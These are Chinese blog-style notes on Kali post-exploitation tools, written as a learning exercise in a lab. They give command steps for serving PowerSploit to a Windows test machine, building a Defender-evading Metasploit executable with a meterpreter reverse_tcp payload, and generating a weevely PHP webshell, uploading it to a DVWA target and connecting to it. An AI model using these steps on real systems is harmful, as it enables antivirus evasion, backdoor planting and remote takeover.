kali里的powersploit、evasion、weevely等工具的杂项记录
在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具
点击后其实是进入一个目录
然后利用python启动一个WEB服务器
在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000
msf框架里的evasion
- msfconsole
- show evasion // 查看免杀模块
- use evasion/windows/windows_defender_exe
- show options // 查看参数
- set filename test.exe //自己定义一个文件名,不然是随机起名
- set payload windows/meterpreter/reverse_tcp
- run
这是一个隐藏目录
可以使用命令
将文件移动到可视位置
学习时可以扔到https://www.virscan.org等平台检测一下
weevely只能生成PHP的网页木马 在kali里执行
weevely generate 123456 /home/kali/test.php
其中123456是密码
到靶机dvwa上传
上传成功后,根据页面提示的路径访问一下木马网页
回到kali,执行
- weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
- 密码要放在最后,且须与前面设置的一致
输入 help 查看可用的远程操作的命令
kali里的powersploit、evasion、weevely等工具的杂项记录相关推荐
- Composer - PHP 世界里用于管理项目依赖的工具
Composer - PHP 世界里用于管理项目依赖的工具 Composer v1.8 版本正式发布.Composer是 PHP 世界里用于管理项目依赖的工具. 如果你已经安装了 Composer , ...
- Kali Linux中前十名的Wifi攻击工具(附官网链接、使用教程)
无线网络的攻与防一直是比较热门的话题,由于无线信号可以被一定范围内的任何人接收到(包括死黑阔),这样就给WIFI带来了安全隐患:路由器生产厂商和网络服务供应商(ISPs)的配置大多是默认开启了WPS, ...
- 使用kali nethunter执行badUSB攻击--基于Rucky工具
使用kali nethunter执行badUSB攻击–基于Rucky工具 1.下载工具 从F-Droid商店下载Rucky工具 2.攻击语言语法介绍 参考up主无序熵增进行整理:https://www ...
- Kali Linux 系统暴力破解压缩包密码工具总结
在 Kali Linux 系统中,有多种工具可以用于暴力破解压缩包密码.下面将介绍几种常用的工具,包括 fcrackzip.zipcracker 和 John the Ripper. 1.fcrack ...
- Docker管理工具-Swarm部署记录
Swarm介绍 Swarm是Docker公司在2014年12月初发布的一套较为简单的工具,用来管理Docker集群,它将一群Docker宿主机变成一个单一的,虚拟的主机.Swarm使用标准的Docke ...
- 微信小程序跳转微信小程序,使用微信开发者工具的测试记录
微信小程序跳转微信小程序,使用微信开发者工具的测试记录 A小程序 跳转 B小程序 编写A小程序代码 参数解释 编写B小程序接收参数代码 微信开发者工具测试 A小程序 跳转 B小程序 编写A小程序代码 ...
- 【KALI基础】字典生成和CRUNCH工具的运用
大家号,今天我们来讲讲如何自己生成字典.我们需要运用Crunch工具.当然这个工具也是在KALI中预先安装好的. 当我们对一些网站渗透时就可以用到字典的生成.比如说学校的网站的登录密码存在一定的规律, ...
- kali中的中国菜刀weevely
weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevel ...
- linux使用交叉工具链产生的程序怎么下载到mini2440里,Ubuntu安装ARM架构GCC工具链(ubuntu install ARM toolchain)最简单办法...
一.安装ARM-Linux-GCC工具链 只需要一句命令: sudo apt-get install gcc-arm-linux-gnueabi 前提是你的Ubuntu系统版本是官网支持的最新的版本, ...
- SAP ABAP里存在Java List这种集合工具类么?CL_OBJECT_COLLECTION了解一下
Jerry以前在工作中交替做着ABAP和Java开发时,总是在使用一种语言时,怀念另一种语言的便利之处,比如用ABAP开发时,怀念Java里以List为代表的功能强大,使用方便的集合工具类. List ...
最新文章
- CodeChef TWOROADS(计算几何+拉格朗日乘数法)
- 淘宝用了mysql,您呢?
- Linux文件系统简介及常用命令
- textarea标签内容为(英文或数字不自动换行)的解决方法
- 亲历2013年TED大会:全球最潮灵感大会
- Sublime和LaTeX支持
- nvidia显卡linux 7.2,科学网—悲喜录:服务器 CentOS 7.2 安装Nvidia显卡驱动(64bit) - 袁伟的博文...
- 点评2009年PHP十大图书(2)
- 在幼儿园实施亲自然生态教育的思考
- win10下载日文输入法时,无法使用日文键盘的问题解决
- MyScript基础功能
- 查看计算机真实用户名(username)
- raw格式转换jpg软件 V5.2
- VR眼镜连接android设备,华为VR眼镜连接电脑教程
- 怎样取消php加密mppe,PHP 加密问题 求大神帮忙? 谢谢
- android三星s8底部菜单,三星Galaxy S8/S8+国行获更新:导航栏可隐藏/视野更宽阔
- Spring系列——@lazy注解
- ONF测试工作张攀:OpenFlow控制器性能测试工具进展
- PP报工确认bapi:BAPI_PRODORDCONF_CREATE_TT
- FX5U Socket通信